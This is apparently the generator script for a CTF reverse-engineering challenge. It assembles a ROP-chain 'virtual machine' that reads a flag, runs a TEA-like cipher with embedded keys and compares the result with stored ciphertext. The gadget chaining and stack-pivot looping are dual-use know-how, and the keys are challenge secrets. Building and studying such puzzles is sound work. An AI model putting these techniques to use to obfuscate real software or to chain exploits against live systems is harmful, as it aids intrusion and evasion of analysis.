5b1fa358637d73d8b2e1908e4553c12a2aa335b5
| 26,913
|
py
|
Python
|
RE/ROPVM/ropvm_binary_generator.py
|
Nu1LCTF/n1ctf-2019
|
1e6876d34a3150e5a86d47447d7ce134001dd10e
|
[
"MIT"
] | 131
|
2018-12-14T06:58:35.000Z
|
2022-03-09T07:29:52.000Z
|
RE/ROPVM/ropvm_binary_generator.py
|
Nu1LCTF/n1ctf-2019
|
1e6876d34a3150e5a86d47447d7ce134001dd10e
|
[
"MIT"
] | 1
|
2020-10-27T18:03:59.000Z
|
2020-10-30T06:21:08.000Z
|
RE/ROPVM/ropvm_binary_generator.py
|
Nu1LCTF/n1ctf-2019
|
1e6876d34a3150e5a86d47447d7ce134001dd10e
|
[
"MIT"
] | 21
|
2019-09-08T14:33:06.000Z
|
2021-08-03T11:41:28.000Z
|
from pwn import *
flag_buf = 0x6cd000
input_prompt = 0x6cd100
correct_prompt = 0x6cd180
wrong_prompt = 0x6cd1c0
correct_buf = 0x6cd200
sum = 0x6cd300
delta = 0x6cd304
v0 = 0x6cd308
v1 = 0x6cd30c
k0 = 0x6cd310
k1 = 0x6cd314
k2 = 0x6cd318
k3 = 0x6cd31c
temp_buf = 0x6cd400
nop_buf = 0x6cd500
table_buf = 0x6cd600
i = table_buf
j = table_buf + 8
entry = 0x6cbbb8
def save_data(data, addr):
buf = ''
buf += p64(0x442976) # pop rdx; ret
buf += p64(data)
buf += p64(0x4015e6) # pop rdi; ret
buf += p64(addr + 8)
buf += p64(0x4315c6) # mov qword ptr [rdi - 8], rdx; ret;
return buf
def __read(fd, buff, leng):
buf = ''
buf += p64(0x4015e6) # pop rdi; ret
buf += p64(fd)
buf += p64(0x401707) # pop rsi; ret
buf += p64(buff)
buf += p64(0x442976)
buf += p64(leng)
buf += p64(0x43f4a0) # read
return buf
def __puts(buff):
buf = ''
buf += p64(0x4015e6) # pop rdi; ret
buf += p64(buff)
buf += p64(0x40fbe0) # puts
return buf
def __exit(val):
buf = ''
buf += p64(0x4015e6) # pop rdi; ret
buf += p64(val)
buf += p64(0x43eaf0) # exit
return buf
data = p32(0xacd01111)
code = ''
code += save_data(u64('Input Fl'), input_prompt)
code += save_data(u64('ag: '.ljust(8,'\x00')), input_prompt + 8)
code += save_data(u64('Congratu'), correct_prompt)
code += save_data(u64('lations!'), correct_prompt + 8)
code += save_data(0, correct_prompt + 16)
code += save_data(u64('Wrong Fl'), wrong_prompt)
code += save_data(u64('ag! '.ljust(8, '\x00')), wrong_prompt + 8)
code += save_data(0x146d16a886dab2be, correct_buf)
code += save_data(0x54f1658f3c9edb52, correct_buf + 8)
code += save_data(0x2a33699d19c12643, correct_buf + 16)
code += save_data(0xc1ce322600cd9e6b, correct_buf + 24)
code += save_data(0, v0)
code += save_data(u64("F14gF114"), k0)
code += save_data(u64("gF11114g"), k2)
code += save_data(4, table_buf + 8)
code += save_data(flag_buf, table_buf + 16)
code += __puts(input_prompt)
code += __read(0, flag_buf, 32)
code += p64(0x4015e6) # pop rdi; ret
code += p64(entry - 8)
code += p64(0x416920) # mov rax, rdi; ret
code += p64(0x478540) # mov rax, qword ptr [rax + 8]; ret;
code += p64(0x4015e6) # pop rdi; ret
code += p64(3176)
code += p64(0x426133) # add rax, rdi; ret
code += p64(0x4015e6) # pop rdi; ret
code += p64(table_buf + 24 - 0x308)
code += p64(0x470e06) # mov qword ptr [rdi + 0x308], rax; ret;
code += p64(0x4015e6) # pop rdi; ret
code += p64(entry - 8)
code += p64(0x416920) # mov rax, rdi; ret
code += p64(0x478540) # mov rax, qword ptr [rax + 8]; ret;
code += p64(0x4015e6) # pop rdi; ret
code += p64(3736)
code += p64(0x426133) # add rax, rdi; ret
code += p64(0x4015e6) # pop rdi; ret
code += p64(table_buf + 32 - 0x308)
code += p64(0x470e06) # mov qword ptr [rdi + 0x308], rax; ret;
# 0x0000000000426133: add rax, rdi; ret;
# 0x0000000000478540: mov rax, qword ptr [rax + 8]; ret;
# 0x0000000000470e06: mov qword ptr [rdi + 0x308], rax; ret;
print len(code)
# code += save_data(0x4242424241414141, v0)
code += p64(0x4015e6) # pop rdi; ret
code += p64(table_buf + 16 - 8)
code += p64(0x416920) # mov rax, rdi; ret
code += p64(0x478540) # mov rax, qword ptr [rax + 8]; ret;
code += p64(0x4015e6) # pop rdi; ret
code += p64(0x10000000000000000 - 8)
code += p64(0x426133) # add rax, rdi; ret
code += p64(0x478540) # mov rax, qword ptr [rax + 8]; ret;
code += p64(0x4015e6) # pop rdi; ret
code += p64(v0 - 0x308)
code += p64(0x470e06) # mov qword ptr [rdi + 0x308], rax; ret;
code += save_data(0x5f3759df00000000, sum)
code += save_data(32, i)
print len(code)
# 920
code += p64(0x4015e6) # pop rdi; ret
code += p64(v1)
code += p64(0x416920) # mov rax, rdi; ret
code += p64(0x474849) # pop rcx; dec dword ptr [rax + 0x63]; ret; # rax + 0x63 == 0x6cd30c + 0x63
code += p64(4)
# cl = 4
code += p64(0x474a89) # mov eax, qword ptr [rax]; ret
# eax = v1
code += p64(0x400e25) # pop rbx; ret
code += p64(temp_buf - 0x20 + 4)
code += p64(0x47caa3) # mov dword ptr [rbx + 0x20], eax; pop rbx; ret;
code += p64(0) # rbx
# temp_buf[1] = v1
code += p64(0x4443d1) # shl eax, cl; pop rbx; pop rbp; ret;
# eax <<= 4
code += p64(temp_buf - 0x20) # rbx
code += p64(0) # rbp
code += p64(0x47caa3) # mov dword ptr [rbx + 0x20], eax; pop rbx; ret;
code += p64(0) # rbx
# temp_buf[0] = v1 << 4
code += p64(0x4015e6) # pop rdi; ret
code += p64(v1)
code += p64(0x416920) # mov rax, rdi; ret
code += p64(0x474849) # pop rcx; dec dword ptr [rax + 0x63]; ret; # rax + 0x63 == 0x6cd30c + 0x63
code += p64(5)
# cl = 5
code += p64(0x442976) # pop rdx; ret
code += p64(temp_buf + 4)
# rdx = &temp_buf[1]
code += p64(0x4015e6) # pop rdi; ret
code += p64(nop_buf)
code += p64(0x416920) # mov rax, rdi; ret
code += p64(0x426d69) # shr dword ptr [rdx], cl; add dword ptr [rax], eax; ret;
# temp_buf[1] = v1 >> 5
code += p64(0x400e25) # pop rbx; ret
code += p64(temp_buf + 4)
# rbx = &temp_buf[1]
code += p64(0x401707) # pop rsi; ret
code += p64(temp_buf)
# rsi = &temp_buf[0]
code += p64(0x43b3d1) # mov ecx, dword ptr [rsi]; mov word ptr [rdi], cx; mov byte ptr [rdi + 2], dh; ret;
# ecx = temp_buf[0]
code += p64(0x4015e6) # pop rdi; ret
code += p64(0x4002e1) # ret
code += p64(0x416920) # mov rax, rdi; ret
code += p64(0x45612a) # xor ecx, dword ptr [rbx]; jmp rax
# ecx ^= rbx
# ecx = temp_buf[1] ^ temp_buf[0]
code += p64(0x4015e6) # pop rdi; ret
code += p64(v1)
code += p64(0x416920) # mov rax, rdi; ret
code += p64(0x474a89) # mov eax, qword ptr [rax]; ret
# eax = v1
code += p64(0x425efa) # add eax, ecx; ret;
# eax = v1 + ((v1 << 4) ^ (v1 >> 5))
code += p64(0x400e25) # pop rbx; ret
code += p64(temp_buf - 0x20)
# rbx + 0x20 = &temp_buf[0]
code += p64(0x47caa3) # mov dword ptr [rbx + 0x20], eax; pop rbx; ret;
code += p64(0)
# temp_buf[0] = eax
code += p64(0x4015e6) # pop rdi; ret
code += p64(nop_buf)
code += p64(0x401707) # pop rsi; ret
code += p64(sum)
code += p64(0x43b3d1) # mov ecx, dword ptr [rsi]; mov word ptr [rdi], cx; mov byte ptr [rdi + 2], dh; ret;
# ecx = sum
code += save_data(0x4002e1, temp_buf + 16)
code += p64(0x401707) # pop rsi; ret
code += p64(temp_buf + 16 + 0x70) # ret
code += p64(0x4015e6) # pop rdi; ret
code += p64(3)
# rdi = 3
code += p64(0x46f6bb) # and ecx, edi; jmp qword ptr [rsi - 0x70];
# ecx = sum & 3
code += p64(0x442976) # pop rdx; ret
code += p64(k0)
# rdx = &k0
code += p64(0x4015e6) # pop rdi; ret
code += p64(0)
code += p64(0x416920) # mov rax, rdi; ret
# rax = 0
code += p64(0x4290f3) # mov ecx, dword ptr [rdx + rcx*4]; mov eax, dword ptr [rdx + rax*4]; sub eax, ecx; ret;
# ecx = key[sum & 3]
code += p64(0x4015e6) # pop rdi; ret
code += p64(sum)
code += p64(0x416920) # mov rax, rdi; ret
code += p64(0x474a89) # mov eax, qword ptr [rax]; ret
# eax = sum
code += p64(0x425efa) # add eax, ecx; ret;
# eax = sum + key[sum & 3]
code += p64(0x400e25) # pop rbx; ret
code += p64(temp_buf + 4 - 0x20)
# rbx + 0x20 = &temp_buf[1]
code += p64(0x47caa3) # mov dword ptr [rbx + 0x20], eax; pop rbx; ret;
code += p64(0)
# temp_buf[1] = eax
code += p64(0x4015e6) # pop rdi; ret
code += p64(nop_buf)
code += p64(0x400e25) # pop rbx; ret
code += p64(temp_buf + 4)
# rbx = &temp_buf[1]
code += p64(0x401707) # pop rsi; ret
code += p64(temp_buf)
# rsi = &temp_buf[0]
code += p64(0x43b3d1) # mov ecx, dword ptr [rsi]; mov word ptr [rdi], cx; mov byte ptr [rdi + 2], dh; ret;
# ecx = temp_buf[0]
code += p64(0x4015e6) # pop rdi; ret
code += p64(0x4002e1) # ret
code += p64(0x416920) # mov rax, rdi; ret
code += p64(0x45612a) # xor ecx, dword ptr [rbx]; jmp rax
# ecx ^= rbx
# ecx = temp_buf[1] ^ temp_buf[0]
# ecx = ((v1 << 4) ^ (v1 >> 5) + v1) ^ (sum + key[sum & 3])
code += p64(0x4015e6) # pop rdi; ret
code += p64(v0)
code += p64(0x416920) # mov rax, rdi; ret
code += p64(0x474a89) # mov eax, qword ptr [rax]; ret
# eax = v0
code += p64(0x425efa) # add eax, ecx; ret;
# eax = v0 + ecx
code += p64(0x400e25) # pop rbx; ret
code += p64(v0 - 0x20)
# rbx + 0x20 = &v0
code += p64(0x47caa3) # mov dword ptr [rbx + 0x20], eax; pop rbx; ret;
code += p64(0)
# v0 = eax
code += p64(0x4015e6) # pop rdi; ret
code += p64(sum)
code += p64(0x416920) # mov rax, rdi; ret
code += p64(0x474a89) # mov eax, qword ptr [rax]; ret
# eax = sum
code += p64(0x4015e6) # pop rdi; ret
code += p64(nop_buf)
code += p64(0x401707) # pop rsi; ret
code += p64(delta)
# rsi = &delta
code += p64(0x43b3d1) # mov ecx, dword ptr [rsi]; mov word ptr [rdi], cx; mov byte ptr [rdi + 2], dh; ret;
# ecx = delta
code += p64(0x425efa) # add eax, ecx; ret;
# eax = sum + delta
code += p64(0x400e25) # pop rbx; ret
code += p64(sum - 0x20)
# rbx + 0x20 = &sum
code += p64(0x47caa3) # mov dword ptr [rbx + 0x20], eax; pop rbx; ret;
code += p64(0)
# sum = eax
code += p64(0x4015e6) # pop rdi; ret
code += p64(v0)
code += p64(0x416920) # mov rax, rdi; ret
code += p64(0x474849) # pop rcx; dec dword ptr [rax + 0x63]; ret; # rax + 0x63 == 0x6cd30c + 0x63
code += p64(4)
# cl = 4
code += p64(0x474a89) # mov eax, qword ptr [rax]; ret
# eax = v0
code += p64(0x400e25) # pop rbx; ret
code += p64(temp_buf - 0x20 + 4)
code += p64(0x47caa3) # mov dword ptr [rbx + 0x20], eax; pop rbx; ret;
code += p64(0) # rbx
# temp_buf[1] = v0
code += p64(0x4443d1) # shl eax, cl; pop rbx; pop rbp; ret;
# eax <<= 4
code += p64(temp_buf - 0x20) # rbx
code += p64(0) # rbp
code += p64(0x47caa3) # mov dword ptr [rbx + 0x20], eax; pop rbx; ret;
code += p64(0) # rbx
# temp_buf[0] = v0 << 4
code += p64(0x4015e6) # pop rdi; ret
code += p64(v0)
code += p64(0x416920) # mov rax, rdi; ret
code += p64(0x474849) # pop rcx; dec dword ptr [rax + 0x63]; ret; # rax + 0x63 == 0x6cd30c + 0x63
code += p64(5)
# cl = 5
code += p64(0x442976) # pop rdx; ret
code += p64(temp_buf + 4)
# rdx = &temp_buf[1]
code += p64(0x4015e6) # pop rdi; ret
code += p64(nop_buf)
code += p64(0x416920) # mov rax, rdi; ret
code += p64(0x426d69) # shr dword ptr [rdx], cl; add dword ptr [rax], eax; ret;
# temp_buf[1] = v0 >> 5
code += p64(0x400e25) # pop rbx; ret
code += p64(temp_buf + 4)
# rbx = &temp_buf[1]
code += p64(0x401707) # pop rsi; ret
code += p64(temp_buf)
# rsi = &temp_buf[0]
code += p64(0x43b3d1) # mov ecx, dword ptr [rsi]; mov word ptr [rdi], cx; mov byte ptr [rdi + 2], dh; ret;
# ecx = temp_buf[0]
code += p64(0x4015e6) # pop rdi; ret
code += p64(0x4002e1) # ret
code += p64(0x416920) # mov rax, rdi; ret
code += p64(0x45612a) # xor ecx, dword ptr [rbx]; jmp rax
# ecx ^= *rbx
# ecx = temp_buf[1] ^ temp_buf[0]
code += p64(0x4015e6) # pop rdi; ret
code += p64(v0)
code += p64(0x416920) # mov rax, rdi; ret
code += p64(0x474a89) # mov eax, qword ptr [rax]; ret
# eax = v0
code += p64(0x425efa) # add eax, ecx; ret;
# eax = v0 + ((v0 << 4) ^ (v0 >> 5))
code += p64(0x400e25) # pop rbx; ret
code += p64(temp_buf - 0x20)
# rbx + 0x20 = &temp_buf[0]
code += p64(0x47caa3) # mov dword ptr [rbx + 0x20], eax; pop rbx; ret;
code += p64(0)
# temp_buf[0] = eax
code += p64(0x4015e6) # pop rdi; ret
code += p64(sum)
code += p64(0x416920) # mov rax, rdi; ret
code += p64(0x474a89) # mov eax, qword ptr [rax]; ret
# eax = sum
code += p64(0x400e25) # pop rbx; ret
code += p64(temp_buf - 0x20 + 8)
code += p64(0x47caa3) # mov dword ptr [rbx + 0x20], eax; pop rbx; ret;
code += p64(0) # rbx
# temp_buf[2] = eax
code += p64(0x4015e6) # pop rdi; ret
code += p64(nop_buf)
code += p64(0x416920) # mov rax, rdi; ret
code += p64(0x474849) # pop rcx; dec dword ptr [rax + 0x63]; ret;
code += p64(11)
# cl = 11
code += p64(0x442976) # pop rdx; ret
code += p64(temp_buf + 8)
# rdx = &temp_buf[2]
code += p64(0x4015e6) # pop rdi; ret
code += p64(nop_buf)
code += p64(0x416920) # mov rax, rdi; ret
code += p64(0x426d69) # shr dword ptr [rdx], cl; add dword ptr [rax], eax; ret;
# temp_buf[2] = sum >> 11
code += p64(0x401707) # pop rsi; ret
code += p64(temp_buf + 8)
# rsi = &temp_buf[2]
code += p64(0x43b3d1) # mov ecx, dword ptr [rsi]; mov word ptr [rdi], cx; mov byte ptr [rdi + 2], dh; ret;
# ecx = temp_buf[2]
code += save_data(0x4002e1, temp_buf + 16)
code += p64(0x401707) # pop rsi; ret
code += p64(temp_buf + 16 + 0x70) # ret
code += p64(0x4015e6) # pop rdi; ret
code += p64(3)
# rdi = 3
code += p64(0x46f6bb) # and ecx, edi; jmp qword ptr [rsi - 0x70];
# ecx = (sum >> 11) & 3
code += p64(0x442976) # pop rdx; ret
code += p64(k0)
# rdx = &k0
code += p64(0x4015e6) # pop rdi; ret
code += p64(0)
code += p64(0x416920) # mov rax, rdi; ret
# rax = 0
code += p64(0x4290f3) # mov ecx, dword ptr [rdx + rcx*4]; mov eax, dword ptr [rdx + rax*4]; sub eax, ecx; ret;
# ecx = key[(sum >> 11) & 3]
code += p64(0x4015e6) # pop rdi; ret
code += p64(sum)
code += p64(0x416920) # mov rax, rdi; ret
code += p64(0x474a89) # mov eax, qword ptr [rax]; ret
# eax = sum
code += p64(0x425efa) # add eax, ecx; ret;
# eax = sum + key[(sum >> 11) & 3]
code += p64(0x400e25) # pop rbx; ret
code += p64(temp_buf + 4 - 0x20)
# rbx + 0x20 = &temp_buf[1]
code += p64(0x47caa3) # mov dword ptr [rbx + 0x20], eax; pop rbx; ret;
code += p64(0)
# temp_buf[1] = eax
code += p64(0x4015e6) # pop rdi; ret
code += p64(nop_buf)
code += p64(0x400e25) # pop rbx; ret
code += p64(temp_buf + 4)
# rbx = &temp_buf[1]
code += p64(0x401707) # pop rsi; ret
code += p64(temp_buf)
# rsi = &temp_buf[0]
code += p64(0x43b3d1) # mov ecx, dword ptr [rsi]; mov word ptr [rdi], cx; mov byte ptr [rdi + 2], dh; ret;
# ecx = temp_buf[0]
code += p64(0x4015e6) # pop rdi; ret
code += p64(0x4002e1) # ret
code += p64(0x416920) # mov rax, rdi; ret
code += p64(0x45612a) # xor ecx, dword ptr [rbx]; jmp rax
# ecx ^= rbx
# ecx = temp_buf[1] ^ temp_buf[0]
# ecx = ((v0 << 4) ^ (v0 >> 5) + v0) ^ (sum + key[(sum >> 11) & 3])
code += p64(0x4015e6) # pop rdi; ret
code += p64(v1)
code += p64(0x416920) # mov rax, rdi; ret
code += p64(0x474a89) # mov eax, qword ptr [rax]; ret
# eax = v1
code += p64(0x425efa) # add eax, ecx; ret;
# eax = v1 + ecx
code += p64(0x400e25) # pop rbx; ret
code += p64(v1 - 0x20)
# rbx + 0x20 = &v1
code += p64(0x47caa3) # mov dword ptr [rbx + 0x20], eax; pop rbx; ret;
code += p64(0)
# v1 = eax
code += p64(0x4015e6) # pop rdi; ret
code += p64(i - 1)
code += p64(0x416920) # mov rax, rdi; ret
code += p64(0x41072c) # dec dword ptr [rax + 1]; ret;
# ecx = i
code += p64(0x4015e6) # pop rdi; ret
code += p64(0)
code += p64(0x416920) # mov rax, rdi; ret
code += p64(0x416a6c) # setne al; neg eax; ret;
code += p64(0x416a6f) # neg eax; ret;
# if i == 0 eax = 0 else eax = 1
code += save_data(3176 - 1048, temp_buf)
code += p64(0x4015e6) # pop rdi; ret
code += p64(nop_buf)
code += p64(0x401707) # pop rsi; ret
code += p64(temp_buf)
code += p64(0x43b430) # mov rcx, qword ptr [rsi]; mov byte ptr [rdi + 8], dh; mov qword ptr [rdi], rcx; ret;
code += p64(0x47ce2f) # imul ecx; ret;
code += save_data(0x4002e1, temp_buf)
code += p64(0x401707) # pop rsi; ret
code += p64(temp_buf)
code += p64(0x43b430) # mov rcx, qword ptr [rsi]; mov byte ptr [rdi + 8], dh; mov qword ptr [rdi], rcx; ret;
code += p64(0x420627) # mov rdi, rax; pop rbx; pop rbp; pop r12; jmp rcx;
code += p64(0) * 3
code += p64(0x442976) # pop rdx; ret
code += p64(table_buf + 24)
code += p64(0x426e48) # mov rax, rdx; ret;
code += p64(0x474a89) # mov eax, qword ptr [rax]; ret
code += p64(0x423b08) # sub rax, rdi; ret;
code += p64(0x400e25) # pop rbx; ret
code += p64(temp_buf - 0x18)
code += p64(0x488064) # mov qword ptr [rbx + 0x18], rax; pop rbx; ret;
code += p64(0)
code += p64(0x4015e6) # pop rdi; ret
code += p64(nop_buf)
code += p64(0x401707) # pop rsi; ret
code += p64(temp_buf)
code += p64(0x43b430) # mov rcx, qword ptr [rsi]; mov byte ptr [rdi + 8], dh; mov qword ptr [rdi], rcx; ret;
code += p64(0x49c7ad) # mov rsp, rcx; ret;
print len(code)
code += p64(0x4015e6) # pop rdi; ret
code += p64(nop_buf)
code += p64(0x401707) # pop rsi; ret
code += p64(v0)
code += p64(0x43b430) # mov rcx, qword ptr [rsi]; mov byte ptr [rdi + 8], dh; mov qword ptr [rdi], rcx; ret;
code += p64(0x4015e6) # pop rdi; ret
code += p64(table_buf + 16 - 8)
code += p64(0x416920) # mov rax, rdi; ret
code += p64(0x478540) # mov rax, qword ptr [rax + 8]; ret;
code += p64(0x4015e6) # pop rdi; ret
code += p64(0x10000000000000000 - 0x40)
code += p64(0x426133) # add rax, rdi; ret
code += p64(0x463bcc) # mov qword ptr [rax + 0x40], rcx; ret;
# 0x0000000000463bcc: mov qword ptr [rax + 0x40], rcx; ret;
code += p64(0x4015e6) # pop rdi; ret
code += p64(table_buf + 16 - 8)
code += p64(0x416920) # mov rax, rdi; ret
code += p64(0x478540) # mov rax, qword ptr [rax + 8]; ret;
code += p64(0x4015e6) # pop rdi; ret
code += p64(8)
code += p64(0x426133) # add rax, rdi; ret
code += p64(0x4015e6) # pop rdi; ret
code += p64(table_buf + 16 - 0x308)
code += p64(0x470e06) # mov qword ptr [rdi + 0x308], rax; ret;
code += p64(0x4015e6) # pop rdi; ret
code += p64(j - 1)
code += p64(0x416920) # mov rax, rdi; ret
code += p64(0x41072c) # dec dword ptr [rax + 1]; ret;
# ecx = j
code += p64(0x4015e6) # pop rdi; ret
code += p64(0)
code += p64(0x416920) # mov rax, rdi; ret
code += p64(0x416a6c) # setne al; neg eax; ret;
code += p64(0x416a6f) # neg eax; ret;
# if j == 0 eax = 0 else eax = 1
code += save_data(3736 - 880, temp_buf)
code += p64(0x4015e6) # pop rdi; ret
code += p64(nop_buf)
code += p64(0x401707) # pop rsi; ret
code += p64(temp_buf)
code += p64(0x43b430) # mov rcx, qword ptr [rsi]; mov byte ptr [rdi + 8], dh; mov qword ptr [rdi], rcx; ret;
code += p64(0x47ce2f) # imul ecx; ret;
code += save_data(0x4002e1, temp_buf)
code += p64(0x401707) # pop rsi; ret
code += p64(temp_buf)
code += p64(0x43b430) # mov rcx, qword ptr [rsi]; mov byte ptr [rdi + 8], dh; mov qword ptr [rdi], rcx; ret;
code += p64(0x420627) # mov rdi, rax; pop rbx; pop rbp; pop r12; jmp rcx;
code += p64(0) * 3
code += p64(0x442976) # pop rdx; ret
code += p64(table_buf + 32)
code += p64(0x426e48) # mov rax, rdx; ret;
code += p64(0x474a89) # mov eax, qword ptr [rax]; ret
code += p64(0x423b08) # sub rax, rdi; ret;
code += p64(0x400e25) # pop rbx; ret
code += p64(temp_buf - 0x18)
code += p64(0x488064) # mov qword ptr [rbx + 0x18], rax; pop rbx; ret;
code += p64(0)
code += p64(0x4015e6) # pop rdi; ret
code += p64(nop_buf)
code += p64(0x401707) # pop rsi; ret
code += p64(temp_buf)
code += p64(0x43b430) # mov rcx, qword ptr [rsi]; mov byte ptr [rdi + 8], dh; mov qword ptr [rdi], rcx; ret;
code += p64(0x49c7ad) # mov rsp, rcx; ret;
print len(code)
code += save_data(0x4002e1, temp_buf)
code += p64(0x4015e6) # pop rdi; ret
code += p64(nop_buf)
code += p64(0x401707) # pop rsi; ret
code += p64(temp_buf)
code += p64(0x43b430) # mov rcx, qword ptr [rsi]; mov byte ptr [rdi + 8], dh; mov qword ptr [rdi], rcx; ret;
code += p64(0x4015e6) # pop rdi; ret
code += p64(flag_buf - 8)
code += p64(0x416920) # mov rax, rdi; ret
code += p64(0x478540) # mov rax, qword ptr [rax + 8]; ret;
code += p64(0x420627) # mov rdi, rax; pop rbx; pop rbp; pop r12; jmp rcx;
code += p64(0) * 3
code += p64(0x442976) # pop rdx; ret
code += p64(correct_buf - 8)
code += p64(0x426e48) # mov rax, rdx; ret;
code += p64(0x478540) # mov rax, qword ptr [rax + 8]; ret;
code += p64(0x423b08) # sub rax, rdi; ret;
code += p64(0x4015e6) # pop rdi; ret
code += p64(0)
code += p64(0x416920) # mov rax, rdi; ret
code += p64(0x416a6c) # setne al; neg eax; ret;
code += p64(0x416a6f) # neg eax; ret;
code += p64(0x400e25) # pop rbx; ret
code += p64(temp_buf + 0x80 - 0x18)
code += p64(0x488064) # mov qword ptr [rbx + 0x18], rax; pop rbx; ret;
code += p64(0)
code += p64(0x4015e6) # pop rdi; ret
code += p64(nop_buf)
code += p64(0x401707) # pop rsi; ret
code += p64(temp_buf)
code += p64(0x43b430) # mov rcx, qword ptr [rsi]; mov byte ptr [rdi + 8], dh; mov qword ptr [rdi], rcx; ret;
code += p64(0x4015e6) # pop rdi; ret
code += p64(flag_buf)
code += p64(0x416920) # mov rax, rdi; ret
code += p64(0x478540) # mov rax, qword ptr [rax + 8]; ret;
code += p64(0x420627) # mov rdi, rax; pop rbx; pop rbp; pop r12; jmp rcx;
code += p64(0) * 3
code += p64(0x442976) # pop rdx; ret
code += p64(correct_buf)
code += p64(0x426e48) # mov rax, rdx; ret;
code += p64(0x478540) # mov rax, qword ptr [rax + 8]; ret;
code += p64(0x423b08) # sub rax, rdi; ret;
code += p64(0x4015e6) # pop rdi; ret
code += p64(0)
code += p64(0x416920) # mov rax, rdi; ret
code += p64(0x416a6c) # setne al; neg eax; ret;
code += p64(0x416a6f) # neg eax; ret;
code += p64(0x400e25) # pop rbx; ret
code += p64(temp_buf + 0x88 - 0x18)
code += p64(0x488064) # mov qword ptr [rbx + 0x18], rax; pop rbx; ret;
code += p64(0)
code += p64(0x4015e6) # pop rdi; ret
code += p64(nop_buf)
code += p64(0x401707) # pop rsi; ret
code += p64(temp_buf)
code += p64(0x43b430) # mov rcx, qword ptr [rsi]; mov byte ptr [rdi + 8], dh; mov qword ptr [rdi], rcx; ret;
code += p64(0x4015e6) # pop rdi; ret
code += p64(flag_buf + 8)
code += p64(0x416920) # mov rax, rdi; ret
code += p64(0x478540) # mov rax, qword ptr [rax + 8]; ret;
code += p64(0x420627) # mov rdi, rax; pop rbx; pop rbp; pop r12; jmp rcx;
code += p64(0) * 3
code += p64(0x442976) # pop rdx; ret
code += p64(correct_buf + 8)
code += p64(0x426e48) # mov rax, rdx; ret;
code += p64(0x478540) # mov rax, qword ptr [rax + 8]; ret;
code += p64(0x423b08) # sub rax, rdi; ret;
code += p64(0x4015e6) # pop rdi; ret
code += p64(0)
code += p64(0x416920) # mov rax, rdi; ret
code += p64(0x416a6c) # setne al; neg eax; ret;
code += p64(0x416a6f) # neg eax; ret;
code += p64(0x400e25) # pop rbx; ret
code += p64(temp_buf + 0x90 - 0x18)
code += p64(0x488064) # mov qword ptr [rbx + 0x18], rax; pop rbx; ret;
code += p64(0)
code += p64(0x4015e6) # pop rdi; ret
code += p64(nop_buf)
code += p64(0x401707) # pop rsi; ret
code += p64(temp_buf)
code += p64(0x43b430) # mov rcx, qword ptr [rsi]; mov byte ptr [rdi + 8], dh; mov qword ptr [rdi], rcx; ret;
code += p64(0x4015e6) # pop rdi; ret
code += p64(flag_buf + 16)
code += p64(0x416920) # mov rax, rdi; ret
code += p64(0x478540) # mov rax, qword ptr [rax + 8]; ret;
code += p64(0x420627) # mov rdi, rax; pop rbx; pop rbp; pop r12; jmp rcx;
code += p64(0) * 3
code += p64(0x442976) # pop rdx; ret
code += p64(correct_buf + 16)
code += p64(0x426e48) # mov rax, rdx; ret;
code += p64(0x478540) # mov rax, qword ptr [rax + 8]; ret;
code += p64(0x423b08) # sub rax, rdi; ret;
code += p64(0x4015e6) # pop rdi; ret
code += p64(0)
code += p64(0x416920) # mov rax, rdi; ret
code += p64(0x416a6c) # setne al; neg eax; ret;
code += p64(0x416a6f) # neg eax; ret;
code += p64(0x400e25) # pop rbx; ret
code += p64(temp_buf + 0x98 - 0x18)
code += p64(0x488064) # mov qword ptr [rbx + 0x18], rax; pop rbx; ret;
code += p64(0)
code += p64(0x4015e6) # pop rdi; ret
code += p64(entry - 8)
code += p64(0x416920) # mov rax, rdi; ret
code += p64(0x478540) # mov rax, qword ptr [rax + 8]; ret;
code += p64(0x4015e6) # pop rdi; ret
code += p64(5264)
code += p64(0x426133) # add rax, rdi; ret
code += p64(0x4015e6) # pop rdi; ret
code += p64(table_buf + 40 - 0x308)
code += p64(0x470e06) # mov qword ptr [rdi + 0x308], rax; ret;
code += p64(0x4260df) # xor rax, rax; ret;
code += p64(0x4015e6) # pop rdi; ret
code += p64(nop_buf)
code += p64(0x401707) # pop rsi; ret
code += p64(temp_buf + 0x80)
code += p64(0x43b430) # mov rcx, qword ptr [rsi]; mov byte ptr [rdi + 8], dh; mov qword ptr [rdi], rcx; ret;
code += p64(0x425ef9) # add rax, rcx; ret;
code += p64(0x401707) # pop rsi; ret
code += p64(temp_buf + 0x88)
code += p64(0x43b430) # mov rcx, qword ptr [rsi]; mov byte ptr [rdi + 8], dh; mov qword ptr [rdi], rcx; ret;
code += p64(0x425ef9) # add rax, rcx; ret;
code += p64(0x401707) # pop rsi; ret
code += p64(temp_buf + 0x90)
code += p64(0x43b430) # mov rcx, qword ptr [rsi]; mov byte ptr [rdi + 8], dh; mov qword ptr [rdi], rcx; ret;
code += p64(0x425ef9) # add rax, rcx; ret;
code += p64(0x401707) # pop rsi; ret
code += p64(temp_buf + 0x98)
code += p64(0x43b430) # mov rcx, qword ptr [rsi]; mov byte ptr [rdi + 8], dh; mov qword ptr [rdi], rcx; ret;
code += p64(0x425ef9) # add rax, rcx; ret;
code += p64(0x4015e6) # pop rdi; ret
code += p64(0)
code += p64(0x416920) # mov rax, rdi; ret
code += p64(0x416a6c) # setne al; neg eax; ret;
code += p64(0x416a6f) # neg eax; ret;
code += save_data(5264 - 5216, temp_buf)
code += p64(0x4015e6) # pop rdi; ret
code += p64(nop_buf)
code += p64(0x401707) # pop rsi; ret
code += p64(temp_buf)
code += p64(0x43b430) # mov rcx, qword ptr [rsi]; mov byte ptr [rdi + 8], dh; mov qword ptr [rdi], rcx; ret;
code += p64(0x47ce2f) # imul ecx; ret;
code += save_data(0x4002e1, temp_buf)
code += p64(0x401707) # pop rsi; ret
code += p64(temp_buf)
code += p64(0x43b430) # mov rcx, qword ptr [rsi]; mov byte ptr [rdi + 8], dh; mov qword ptr [rdi], rcx; ret;
code += p64(0x420627) # mov rdi, rax; pop rbx; pop rbp; pop r12; jmp rcx;
code += p64(0) * 3
code += p64(0x442976) # pop rdx; ret
code += p64(table_buf + 40)
code += p64(0x426e48) # mov rax, rdx; ret;
code += p64(0x474a89) # mov eax, qword ptr [rax]; ret
code += p64(0x423b08) # sub rax, rdi; ret;
code += p64(0x400e25) # pop rbx; ret
code += p64(temp_buf - 0x18)
code += p64(0x488064) # mov qword ptr [rbx + 0x18], rax; pop rbx; ret;
code += p64(0)
code += p64(0x4015e6) # pop rdi; ret
code += p64(nop_buf)
code += p64(0x401707) # pop rsi; ret
code += p64(temp_buf)
